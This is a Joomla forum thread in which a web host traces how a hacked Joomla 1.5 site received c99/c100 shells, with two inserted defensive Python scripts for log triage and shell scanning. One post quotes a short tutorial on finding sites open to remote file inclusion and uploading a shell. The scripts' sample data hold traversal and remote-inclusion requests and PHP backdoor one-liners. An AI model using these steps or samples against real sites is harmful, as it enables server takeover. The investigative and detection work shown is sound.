[solved] Finding the entry point of the hack

rodajr
Joomla! Apprentice
Posts: 24
Joined: Fri May 27, 2011 8:26 pm

Post by rodajr » Tue Aug 02, 2011 6:03 pm

Hello guys,

Straight to the subject:

We are the host and we have a hacked website. The webmaster said this: "our site is security level 5 and we know that it is technically impossible to insert files into the server through the website". <- no comment about this

Because of this our server has been going down a lot since last week, when we discovered the hack, and we have spam mail going out of the server.

Searching the website folder we found a few files with malicious code.

I need help to find out how the hacker placed those files on the server.
What kind of attack was it?
Was the entry point really through the website?

Anyway, I need more information, and I prefer advice / suggestions / ideas from this forum because I need to prepare a proper answer for our client.

The website is Joomla 1.5 and I already checked it with the jts-post_1.1.1 script to see the 3rd party components / modules; they are not in the vulnerable extensions list.


Can I paste the PHP code that we found here?
The file is CPhack.php.

I hope I wrote a clear explanation; if not, just say so and I will try my best in the next post.

alikon
Joomla! Champion
Posts: 5941
Joined: Fri Aug 19, 2005 10:46 am
Location: Roma

Re: Finding the entry point of the hack

Post by alikon » Tue Aug 02, 2011 6:10 pm

rodajr wrote: we know that it is technically impossible to insert files into the server through the website
Have you heard about RFI?
Read this on Wikipedia.
Nicola Galgano
i know that i don't know
www.alikonweb.it

Webdongle
Joomla! Master
Posts: 44093
Joined: Sat Apr 05, 2008 9:58 pm

Re: Finding the entry point of the hack

Post by Webdongle » Tue Aug 02, 2011 6:20 pm

  • Delete ALL the folders and files on the server. That's ALL the folders and files.
    (you can leave the configuration.php if you physically inspect it).
  • Check ALL the computers that have server access for malware etc. That's ALL the computers that have server access .
  • Change your passwords.
  • Use the files from the Joomla full package to upload to the server. All except the /installation folder.
http://forum.joomla.org/viewtopic.php?f=432&t=475313
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".


Re: Finding the entry point of the hack

Post by rodajr » Tue Aug 02, 2011 6:30 pm

Yes sir, I did.

And that particular article made me post here.
I want to know exactly how the attack happened, to prevent future problems and to learn.
I'm studying the case; I just need a few directions.

I just learned that there seem to be 3 injection attacks, but I'm looking for the entry.

I have checked this so far:
http://docs.joomla.org/Security_Checkli ... rver_Setup
http://forum.joomla.org/viewtopic.php?f=432&t=590555
and others

and meanwhile our server administrator is running a few countermeasures.

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Finding the entry point of the hack

Post by mandville » Tue Aug 02, 2011 6:37 pm

Running and posting the jts results will help give a clue to what's going on.
Checklist 7 is also a good read.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}


Re: Finding the entry point of the hack

Post by rodajr » Tue Aug 02, 2011 6:44 pm

Thank you for the replies.

Webdongle, I checked the link you posted before, but I want to know how this happened.

We are not going to wipe Joomla from our server yet; the webmaster is "trying" to clean his work. He is not from our company.

We are trying to figure out what is happening to our server.
We think the hacker got into the website, placed files to do brute force and used our server to send spam.

I will paste the code here.


Re: Finding the entry point of the hack

Post by rodajr » Tue Aug 02, 2011 6:46 pm

Mandville, thank you.

Yes, I did that too. I saw your posts around.
I can't use the script right now because the webmaster put the site offline.

Here is what I have now.
Last edited by alikon on Tue Aug 02, 2011 7:19 pm, edited 1 time in total.
Reason: hack code removed


Re: Finding the entry point of the hack

Post by rodajr » Tue Aug 02, 2011 6:54 pm

I can't post the script info yet; meanwhile...


The file I posted is the CPhack.php we found in the root folder of the website.


Re: Finding the entry point of the hack

Post by Webdongle » Tue Aug 02, 2011 7:04 pm

rodajr wrote:....
I cant use the script right now because the webmaster put the site in off .
...
Which site ? The one that should have been deleted or the files from a fresh Joomla full package ?


Re: Finding the entry point of the hack

Post by rodajr » Tue Aug 02, 2011 7:31 pm

The hacked one.

Like I said, we are the host only. The webmaster thinks our server is the problem. And right now he is checking his Joomla.


Re: Finding the entry point of the hack

Post by Webdongle » Tue Aug 02, 2011 7:49 pm

rodajr wrote:....
Like I said, we are the host only. The webmaster think our server is the problem. And right now he is checking his joomla.
Ok, I'm with it now.
The jts post assistant will run even if the site is set Offline. The question is, do you have the right to run it on the server to (what can only be described as) spy on his setup? If you tick the boxes it will tell you a lot of info, including all the extensions used. That way you can see if he is using any extensions on the VEL :D
[attachment: Screenshot-653.png]
And a wealth of other information.


Re: Finding the entry point of the hack

Post by rodajr » Tue Aug 02, 2011 8:33 pm

It isn't running; the webmaster is working :(
This is the message:

jtablesession::Store Failed
DB function failed with error number 145
Table './our_bd/jos_session' is marked as crashed and should be repaired SQL=INSERT INTO `jos_session` ( `session_id`,`time`,`username`,`gid`,`guest`,`client_id` ) VALUES ( '84b058cd0196f4b1d2153b97ae52cf32','1312317081','','0','1','0' )


This is one of our problems: the webmaster. Our client hired him.

PS: the "dude" doesn't know what happened and he is saying it is an issue on our server. He tried to fix some Joomla database problem. Oh boy!! This is going to be a hell of a week :((

The webmaster is trying to put the blame on us. :(


Re: Finding the entry point of the hack

Post by Webdongle » Tue Aug 02, 2011 8:47 pm

But it ran before ? I tested on a 1.5 local install with site Offline and it worked for me. So if it worked before then someone has messed with something on the site or in the database.

Addendum
Have you checked the access logs for ../../../../ type paths ?
Last edited by Webdongle on Tue Aug 02, 2011 9:07 pm, edited 1 time in total.


Re: Finding the entry point of the hack

Post by rodajr » Tue Aug 02, 2011 9:06 pm

Yes, it ran.

I checked all their components against the vulnerable extensions list.
We have to wait for the damn guy to fix what he is trying to do :(

It is complicated.

Well, meanwhile, we changed the passwords of all the client's email accounts due to the spam warning.
We put some brute-force protection on. So far, 6 hours without problems on the server.
Coincidence or not, the website was offline too.


Re: Finding the entry point of the hack

Post by Webdongle » Tue Aug 02, 2011 9:08 pm

Have you checked the access logs for ../../../../ type paths ?


Re: Finding the entry point of the hack

Post by rodajr » Tue Aug 02, 2011 9:09 pm

Ok guys, I will not update until tomorrow.

Thank you for all the replies and attention. Talk to you in a bit.

cya


Re: Finding the entry point of the hack

Post by rodajr » Wed Aug 03, 2011 2:59 pm

hello guys,

I did it.
JTS-post Diagnostic Information wrote:Joomla! Version: AIserver .0 Production/Stable [ Khepri ] Agosto-2008 23:55 GMT
configuration.php: Writable (Mode: 644 ) | Architecture/Platform: Linux 2.6.18-194.26.1.el5xen ( x86_64) | Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 ( http://******) | PHP Version: 5.2.9
PHP Requirements: register_globals: Disabled | magic_quotes_gpc: Enabled | safe_mode: Disabled | MySQL Support: Yes | XML Support: Yes | zlib Support: Yes
mbstring Support (1.5 or above): No | iconv Support (1.5 or above): Yes | save.session_path: Writable | Max.Execution Time: 30 seconds | File Uploads: Enabled
MySQL Version: 5.0.92-community ( Localhost via UNIX socket )
JTS-post Extended Information wrote:SEF: Disabled | Legacy Mode: N/A | FTP Layer: N/A | htaccess: Implemented
PHP/suExec: User and Web Server accounts are the same. (PHP/suExec probably installed)
PHP Environment: API: cgi | MySQLi: No | Max. Memory: 32M | Max. Upload Size: 2M | Max. Post Size: 8M | Max. Input Time: 60 | Zend Version: 2.2.0
Disabled Functions:
MySQL Client: 5.0.92 ( latin1 )

So, our server was up for about 12 hours, then the webmaster put his Joomla back on and our server went down again.


Re: Finding the entry point of the hack

Post by mandville » Wed Aug 03, 2011 5:06 pm

I do not recognise that version of Joomla. Nothing we currently support is that old.
I would be tempted to surrender your client again unless they use a current secure version.


Re: Finding the entry point of the hack

Post by Webdongle » Wed Aug 03, 2011 5:20 pm

http://docs.joomla.org/Khepri_Template_CSS
Oct 2008

http://www.projectamplify.com/joomla-15 ... plate.html
Since this is a core file it's best to copy this file to the root of the default front end template and then make edits. This will override the file at templates/system/offline.php
http://joomlawebhosting.ca/index.php?op ... whitelabel
Looks like it is an Administrator Template that some people install outside of the /administrator ??? Sounds like a possible way for a site to be hacked from ?


Re: Finding the entry point of the hack

Post by rodajr » Wed Aug 03, 2011 6:01 pm

We did a test with the file we found, CPhack.php.

It is a method to get the cPanel login and so on.
It just opens a page on the website showing the information, not saving it in a file on the server. The file has an encrypted part with this information:



Ok. Fact: someone found an entry in the website, did a PHP injection, put the file on the server (website folder), got information and started to use our server as a spam sender.

Questions remain:

- still, what entry point?
- why does our server go down because of it? (when the website was offline, and I mean his database, the server stayed up, running normally and not sending spam out)


We are checking logs and monitoring.
Last edited by mandville on Wed Aug 03, 2011 6:13 pm, edited 1 time in total.
Reason: removed script


Re: Finding the entry point of the hack

Post by Webdongle » Wed Aug 03, 2011 7:16 pm

What extensions were installed ?

are there any ../../../ type url's in the logs ?


Re: Finding the entry point of the hack

Post by rodajr » Wed Aug 03, 2011 7:41 pm

I will make a list of what they have on it.

************


Administrator Components
 Component Name  Version  Author  Author Site  Type

 Polls  v1.5.0  Joomla! Project  www.joomla.org  Core
 This component manages polls...

 Banners  v1.5.0  Joomla! Project  www.joomla.org  Core
 This component manages banners and banner clients...

 HsConfig  v1.0.3  Ken Lowther  www.joomlanook.com  3rd Party


 ccNewsletter  v1.0.4 Stable  AI  www.aiserver.com.br  3rd Party
 Sistema de newsletter...

 Contact Items  v1.0.0  Joomla! Project  www.joomla.org  Core
 Parameters for individual Contact Items...

 Contact  v1.5.0  Joomla! Project  www.joomla.org  Core
 This component shows a listing of Contact Information...

 Trash  v1.0.0  Joomla! Project  www.joomla.org  Core
 PARAMTRASH...

 Frontpage  v1.5.0  Joomla! Project  www.joomla.org  Core
 This Component shows all the published Articles from your site marked Show on Front Page....

 Configuration Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Configuration Manager...

 JCE  v1.5.7  Ryan Demmer  www.joomlacontenteditor.net  3rd Party
 JCE ADMIN DESC...

 Media Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 This component manages site media...

 Zoo  v1.0.4  YOOtheme  www.yootheme.com  3rd Party
 Zoo Joomla 1.5 component from YOOtheme.com (http://www.yootheme.com)...

 Cache Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Cache Manager...

 Language Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Language Manager...

 User Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 User Manager...

 Plugin Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Plugin Manager...

 Module Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Module Manager...

 Installation Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Installation Manager...

 Menus Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Menu Manager...

 Search  v1.5.0  Joomla! Project  www.joomla.org  Core
 DESCSEARCH...

 Messaging  v1.5.0  Joomla! Project  www.joomla.org  Core
 Messaging...

 Template Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Template Manager...

 Control Panel  v1.5.0  Joomla! Project  www.joomla.org  Core
 The Control Panel is the Home Page of the Joomla! Administrator Back-end...

 Mass Mail  v1.5.0  Joomla! Project  www.joomla.org  Core
 DESCMASSMAIL...

 Content Page  v1.5.0  Joomla! Project  www.joomla.org  Core
 DESCCONTENT...

Done Processing Administrator Components


Site Components
 Component Name  Version  Author  Author Site  Type

 Wrapper  v1.5.0  Joomla! Project  www.joomla.org  Core
 Wrapper...

 MailTo  v1.5.0  Joomla! Project  www.joomla.org  Core
 A generic mail to friend component...

 User  v1.5.0  Joomla! Project  www.joomla.org  Core
 User Self-Management...

Done Processing Site Components

Administrator Modules
 Module Name  Version  Author  Author Site  Type

Done Processing Administrator Modules


Site Modules
 Modules Name  Version  Author  Author Site  Type

Done Processing Site Modules

Site Plugins
 Plugin Name  Version  Author  Author Site  Type

 Editor - XStandard Lite for Joomla!  v1.0  Joomla! Project  www.joomla.org  Core
 DESCXSTANDARD

 Editor - JCE 1.5.6  v1.5.6  Ryan Demmer  www.joomlacontenteditor.net  3rd Party
 JCE EDITOR DESC

 Editor - None  v1.0  3rd Party
 This loads a basic text entry field

 Editor - TinyMCE 3  v3.2.6  Moxiecode Systems AB  tinymce.moxiecode.com/  3rd Party
 DESCTINYMCE

 Content - Load Modules  v1.5  Joomla! Project  www.joomla.org  Core
 DESCLOADPOSITION

 Content - Highslide  v2.0.0  Ken Lowther  www.joomlanook.com  3rd Party
 HIGHSLIDE

 Content - Vote  v1.5  Joomla! Project  www.joomla.org  Core
 Add the Voting functionality to Items

 Content - Code Highlighter (GeSHi)  v1.5  Joomla! Project  qbnz.com/highlighter  Core
 DESCGESHI

 Content - Example  v1.0  Joomla! Project  www.joomla.org  Core
 An example content plugin

 Content - Email Cloaking  v1.5  Joomla! Project  www.joomla.org  Core
 DESCMOSEMAILCLOAK

 Content - Pagebreak  v1.5  Joomla! Project  www.joomla.org  Core
 DESCCONTENTPAGEBREAK

 Content - KA Facebook Comments  v1.5.x.2.3  Khawaib Ahmed  www.Khawaib.co.uk  3rd Party
 KAFACEBOOKCOMMENTSPLG_INSTALLATION

 Content - Page Navigation  v1.5  Joomla! Project  www.joomla.org  Core
 DESCPAGENAVIGATION

 System - Modal Popup Content  v1.0  DoJoomla  www.dojoomla.com  3rd Party
 Modal Popup Content

 System - Log  v1.5  Joomla! Project  www.joomla.org  Core
 Provides system logging

 AIeffects  v1.5.0  FNC  www.aiserver.com.br  3rd Party
 AIeffects plugin

 System - Remember Me  v1.5  Joomla! Project  www.joomla.org  Core
 Provides remember me functionality

 System - Legacy  v1.5  Joomla! Project  www.joomla.org  Core
 Provides legacy support for older version of Joomla!

 System - Cache  v1.5  Joomla! Project  www.joomla.org  Core
 Provides page caching

 System - Backlinks  v1.5  Joomla! Project  www.joomla.org  Core
 Provides backlink support

 System - SEF  v1.5  Joomla! Project  www.joomla.org  Core
 DESCPLGSYSTEMSEF

 System - JavaScript SDK  v1.5.x.3.3.1  Khawaib Ahmed  www.Khawaib.co.uk  3rd Party
 JASCRIPTSDK_INSTALLATION

 System - Debug  v1.5  Joomla! Project  www.joomla.org  Core
 Provides debug information

 User - Example  v1.0  Joomla! Project  www.joomla.org  Core
 An example user synchronisation plugin

 User - Joomla!  v1.5  Joomla! Project  www.joomla.org  Core
 PLG_USER_JOOMLA

 Search - Sections  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Content Section information

 Search - Weblinks  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Weblinks Component

 Search - Contacts  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Contacts Component

 Search - Newsfeeds  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Newsfeeds

 Search - Content  v1.5  Joomla! Project  www.joomla.org  Core
 ALLOWS SEARCHING OF ALL ARTICLES

 Search - Zoo  v1.0.2  YOOtheme  www.yootheme.com  3rd Party
 Zoo Search Joomla 1.5 plugin from YOOtheme.com (http://www.yootheme.com)

 Search - Categories  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Categories information

 XML-RPC - Blogger API  v1.0  Joomla! Project  www.joomla.org  Core
 Blogger XML-RPC API

 XML-RPC - Joomla API  v1.0  Joomla! Project  www.joomla.org  Core
 Joomla! XML-RPC API

 Button - Image  v1.0.0  Joomla! Project  www.joomla.org  Core
 DESCIMAGE

 Button - Readmore  v1.5  Joomla! Project  www.joomla.org  Core
 DESCREADMORE

 Button - Pagebreak  v1.5  Joomla! Project  www.joomla.org  Core
 DESCPAGEBREAK

 Authentication - Example  v1.5  Joomla! Project  www.joomla.org  Core
 An example of an authentication plugin

 Authentication - LDAP  v1.5  Joomla! Project  www.joomla.org  Core
 Handles user authentication against an LDAP server

 Authentication - Joomla  v1.5  Joomla! Project  www.joomla.org  Core
 Handles Joomlas default user authentication

 Authentication - GMail  v1.5  Joomla! Project  www.joomla.org  Core
 Handles user authentication with a GMail account

 Authentication - OpenID  v1.5  Joomla! Project  www.joomla.org  Core
 Handles user authentication with an OpenID (Requires PHP5)


Re: Finding the entry point of the hack

Post by Webdongle » Wed Aug 03, 2011 8:09 pm

None of those appear to be up to date versions.

What about your access logs ? any ../../../../ type entries ?


Re: Finding the entry point of the hack

Post by rodajr » Wed Aug 03, 2011 10:00 pm

Guys,

I'm already looking, but do you have something about the c99 shell?
We decrypted some code and that was a known name.
I know this is a tool for RFI. I need more safe material to study.


Re: Finding the entry point of the hack

Post by Webdongle » Wed Aug 03, 2011 10:20 pm

use google to find site vulnerability: inurl:index.php?page=
To test whether the site is vulnerable, just delete the parameter value and replace it with http://www.google.com
example: http://www.vulnerabilitysite.com/index.php?page=HERE REPLACE!http://www.google.com then press enter; if you get a site like Google then the site is vulnerable! Upload a shell on http://www.110mb.com and replace the url http://www.google.com and that's it!
http://www.hackcommunity.com/Thread-How ... -shell-c99

http://www.exploit-db.com/exploits/17603/

http://www.[youtube].com/watch?v=ylDzxXez ... re=related
Drag the bar about 2/3 along and watch how it's put in. Then you will see why I asked about access logs with ../../../../ in the URL.

http://www.[youtube].com/watch?v=o4NtQvgv ... re=related

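The log check Webdongle keeps asking for (requests with ../../../../ in the path, and the page=http://... RFI probe described in the quoted text), as an added example that is not part of the original thread: a small Python triage script over Apache combined-format access log lines. The log lines, the IP addresses and the KNOWN_PHP allowlist are constructed for the example and are not taken from the hacked server. It double-URL-decodes each request before inspecting it, flags traversal sequences and null bytes, flags any query parameter whose value is a remote URL (the RFI probe), and flags direct requests to PHP files that are not core entry points, which is how a dropped file such as CPhack.php shows up once the attacker starts using it.

```python
"""Triage Apache combined-format access logs for traversal, RFI and web-shell requests."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (not real traffic from the thread); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Aug/2011:14:01:07 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Aug/2011:14:02:11 +0000] "GET /index.php?option=com_example&controller=../../../../../../etc/passwd%00 HTTP/1.1" 200 1042 "-" "libwww-perl/5.8"
203.0.113.9 - - [02/Aug/2011:14:02:40 +0000] "GET /index.php?option=com_example&page=http://www.google.com HTTP/1.1" 200 20310 "-" "libwww-perl/5.8"
203.0.113.9 - - [02/Aug/2011:14:03:05 +0000] "GET /index.php?option=com_example&page=http://203.0.113.77/c99.txt? HTTP/1.1" 200 55213 "-" "libwww-perl/5.8"
203.0.113.9 - - [02/Aug/2011:14:05:22 +0000] "POST /CPhack.php HTTP/1.1" 200 2211 "-" "libwww-perl/5.8"
198.51.100.3 - - [02/Aug/2011:14:06:00 +0000] "GET /search-site.html HTTP/1.1" 200 6231 "-" "Mozilla/5.0"
"""

# ip, ident, user, [timestamp], "METHOD url PROTO", status, size (referer/UA ignored)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# PHP files that are legitimately requested directly in a Joomla 1.5 webroot.
# Assumption for this example; extend it from a clean package if you use it for real.
KNOWN_PHP = {"/index.php", "/index2.php", "/administrator/index.php"}


def classify(url):
    """Return the reasons a request URL looks hostile (empty list if none)."""
    reasons = []
    decoded = unquote(unquote(url))  # two passes so %252e%252e (double-encoded ..) is caught
    parts = urlsplit(decoded)
    if "../" in decoded or "..\\" in decoded:
        reasons.append("directory traversal")
    if "\x00" in decoded:
        reasons.append("null byte")
    for key, val in parse_qsl(parts.query, keep_blank_values=True):
        if re.match(r"(?i)^(https?|ftp)://", val):
            reasons.append(f"remote URL in parameter {key!r} (RFI probe)")
    if parts.path.endswith(".php") and parts.path not in KNOWN_PHP:
        reasons.append(f"direct request to non-core script {parts.path}")
    return reasons


def triage(log_text):
    """Parse each line and keep only the requests classify() objects to."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or non-access line; skip rather than guess
        reasons = classify(m["url"])
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "url": m["url"],
                             "status": int(m["status"]), "reasons": reasons})
    return findings


def suspects_by_ip(findings):
    """Group findings by client address so one probing host is read as one story."""
    by_ip = defaultdict(list)
    for f in findings:
        by_ip[f["ip"]].append(f)
    return dict(by_ip)


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], f["url"], "->", "; ".join(f["reasons"]))
```

On a real server, feed it the file with triage(open("/path/to/access_log").read()) and read the output per IP: a traversal probe, a page=http:// probe and then a request to a new .php file from the same address, in that order, is the sequence the thread is looking for. A 200 on the RFI probe is not proof by itself (Joomla often serves the home page for unknown parameters); the proof is the follow-up request to the dropped file. PhilD's caveat later in the thread still applies: if the attacker had a shell, the log may have been edited, so treat an empty result as inconclusive rather than clean.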

Re: Finding the entry point of the hack

Post by rodajr » Thu Aug 04, 2011 1:33 pm

Webdongle,

Thank you dude! I really appreciate all your replies. :D
I couldn't check the logs; my co-worker is on server duty.
I was researching and studying the code.

Now I understand what you were asking me. I'll ask for all the logs we can get.

Question 1: can I find logs in Joomla too? I'm not an expert in Joomla; I have been studying it for about 2 months and just started to learn the code in it.
I checked the basic folders.

Question 2 (I'm still reading and watching the material you linked): the hacked website was using SEF; even with this, can the injection be used in the URL?


Re: Finding the entry point of the hack

Post by Webdongle » Thu Aug 04, 2011 3:49 pm

To the best of my understanding,
SEF URLs are 'symbolic' links that are routed to the normal links.

eg
If you have SEF from a menu item of
www.yoursite.com/search-site.html
then
http://www.yoursite.com/index.php?optio ... iew=search
will still reach the search page

:D
http://www.yoursite.com/index.php?optio ... iew=search is a great way to search a 1.5 even when there is no menu item. So if you don't put a search button on a site because you don't want Search. Then go to Extensions >>> install/uninstall ... Components ... The just 'toggle' the green tick next to the Search module.


Re: Finding the entry point of the hack

Post by rodajr » Fri Aug 05, 2011 12:22 pm

Just to update this thread.

We took a few security measures on our server and we deleted the website, the whole thing, to be sure, since we had found some malicious files on the server.
Now we are uploading the website again, with the hack scripts, and starting to monitor the entries. We hope to find the weak point before we ask the webmaster to upload a really clean version.

btw, we found some files that lead us to the c100 shell.

PhilD
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Finding the entry point of the hack

Post by PhilD » Fri Aug 05, 2011 12:58 pm

c99, c57, c100, and other variants are all server root kit shells.

They enable the hacker in most cases to browse the entire server without any passwords required as if it were a hard drive on his computer. This means the hacker can do whatever he wants to anything on the server, as well as anything to any domain, or any software (Joomla, wordpress etc.) installed on any domain. This includes installing backdoors to the server, installing additional malware/root kits etc.

By having or leaving the c100 or any variants on the domain you are never going to fix the hack and you are risking further infection of the server, if the server has not already been rooted.

Log files are mostly useless if the person knows how to use the shell as the times and entries can be altered.

I would suggest you wipe your site and start over following checklist 7 and inform your host of the found shell script(s).
PhilD
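PhilD's point that whoever holds the shell can edit the logs is the reason to lean on file-level evidence instead: compare the webroot against a clean copy of the same Joomla release (the "full package" Webdongle recommends re-uploading) and scan for shell markers, without trusting timestamps. As an added example that is not part of the original thread, the Python below does both. The two in-memory trees, their file contents and the CPhack.php / images/stories/.cache.php names are constructed for the demonstration; the marker regexes are a generic starting set of c99/c100-style indicators, not a complete signature database; manifest_from_dir() builds the same manifest from a real directory. configuration.php is excluded from the hash diff because it is site-specific (Webdongle's "inspect it physically" advice), but it is still content-scanned.

```python
"""Diff a suspect Joomla webroot against a clean package and scan for web-shell markers."""
import hashlib
import os
import re

# Generic indicators of c99/c100-style PHP shells and their droppers.
# Assumption: an example starting set, tuned for this demonstration only.
SHELL_MARKERS = [
    ("eval of decoded payload",
     re.compile(rb"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("command execution from request data",
     re.compile(rb"\b(passthru|shell_exec|system|popen|proc_open|exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)")),
    ("preg_replace /e code execution",
     re.compile(rb"\bpreg_replace\s*\(\s*['\"][^'\"]*/e['\"]")),
    ("known shell name",
     re.compile(rb"\b(c99|c100|r57)(sh|shell)?\b", re.IGNORECASE)),
    ("variable function call on request data",
     re.compile(rb"\$_(GET|POST|REQUEST)\s*\[[^\]]+\]\s*\(\s*\$_(GET|POST|REQUEST)")),
]


def manifest(files):
    """files: relative path -> bytes. Returns path -> sha256 hex digest."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def manifest_from_dir(root):
    """Same as manifest() but walks a real directory, e.g. the unpacked clean package."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                files[os.path.relpath(full, root).replace(os.sep, "/")] = fh.read()
    return manifest(files)


def diff_manifests(clean, suspect, ignore=("configuration.php",)):
    """Return (added, modified, missing) relative paths. Paths in `ignore` are
    site-specific and expected to differ from the package, so they are not diffed."""
    added = sorted(p for p in suspect if p not in clean and p not in ignore)
    modified = sorted(p for p in suspect
                      if p in clean and p not in ignore and clean[p] != suspect[p])
    missing = sorted(p for p in clean if p not in suspect)
    return added, modified, missing


def scan_markers(files):
    """Return path -> marker names for every file whose bytes match at least one marker."""
    report = {}
    for path, data in files.items():
        hits = [name for name, rx in SHELL_MARKERS if rx.search(data)]
        if hits:
            report[path] = hits
    return report


def investigate(clean_files, suspect_files):
    """Combine the package diff with the content scan; every suspect file is scanned,
    including the ones the diff ignores."""
    added, modified, missing = diff_manifests(manifest(clean_files), manifest(suspect_files))
    return {"added": added, "modified": modified, "missing": missing,
            "markers": scan_markers(suspect_files)}


# Constructed sample trees: tiny stand-ins for a Joomla 1.5 package and the hacked copy.
CLEAN = {
    "index.php": b"<?php\ndefine('_JEXEC', 1);\nrequire_once dirname(__FILE__).'/includes/framework.php';\n",
    "templates/system/offline.php": b"<?php defined('_JEXEC') or die('Restricted access'); ?>\n<p>Site offline</p>\n",
    "configuration.php": b"<?php class JConfig { var $dbtype = 'mysql'; }\n",
}
SUSPECT = dict(CLEAN)
SUSPECT["configuration.php"] = b"<?php class JConfig { var $dbtype = 'mysql'; var $password = 'x'; }\n"
SUSPECT["templates/system/offline.php"] = (CLEAN["templates/system/offline.php"]
                                           + b"<?php eval(base64_decode('ZWNobyAnaGknOw==')); ?>\n")
SUSPECT["CPhack.php"] = b"<?php /* c99shell dropper */ eval(gzinflate(base64_decode('eJw='))); ?>\n"
SUSPECT["images/stories/.cache.php"] = b"<?php $_GET['a']($_GET['b']); ?>\n"

if __name__ == "__main__":
    report = investigate(CLEAN, SUSPECT)
    for key in ("added", "modified", "missing"):
        print(f"{key}: {report[key]}")
    for path, hits in sorted(report["markers"].items()):
        print(f"marker(s) in {path}: {', '.join(hits)}")
```

Two things the example is built to show: a core file (here templates/system/offline.php, the Khepri file Webdongle mentions) comes back as "modified" even though its name is unremarkable, and a dropped file hidden as a dot-file under a writable upload directory comes back as "added" whether or not any marker fires on it. The marker list is only a second opinion; the manifest diff is the finding. Run manifest_from_dir() on both the unpacked clean package and the suspect webroot and feed the two manifests to diff_manifests(), then hand anything added or modified to scan_markers() or to a human.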


Re: Finding the entry point of the hack

Post by rodajr » Fri Aug 05, 2011 1:26 pm

Hi Phil,

Thanks for the info; you said a few things I wasn't aware of. I'm still studying what happened. Btw, this forum, this thread and the people who replied have helped me a lot.
But we are the host, and this is the first time we have faced this. We are trying to learn how to prevent it in the future.
In my case, I really want to know the entry point in Joomla.

We found a lot of "alien" files on the server and my co-worker deleted them and tried to fix all the doors he found.

A question for you. If we clean what we have on the server now and put the website back with the alien script on it, what could happen? Failed attempts to get in again? Or an open door?
Or, to start the whole thing again, does the hacker have to do the injection attack again and so on?

